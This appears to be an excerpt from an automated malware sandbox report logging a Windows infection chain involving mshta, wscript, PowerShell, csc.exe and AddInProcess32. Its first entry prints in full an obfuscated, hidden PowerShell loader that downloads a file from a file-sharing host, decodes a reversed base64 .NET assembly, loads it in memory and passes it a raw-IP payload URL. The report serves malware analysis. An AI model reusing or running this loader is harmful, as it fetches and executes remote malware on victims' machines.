Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)\| .((Get-VARIabLE 'mdr').Name[3,11,2]-JoiN'')"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.cmdline"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_031E3CAD push esp; retf	1_2_031E3CB1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_030C36D9 push ebx; iretd	10_2_030C36DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 12_2_01160285 push ebp; retf	12_2_01160283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 12_2_0660E920 push es; ret	12_2_0660E930

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
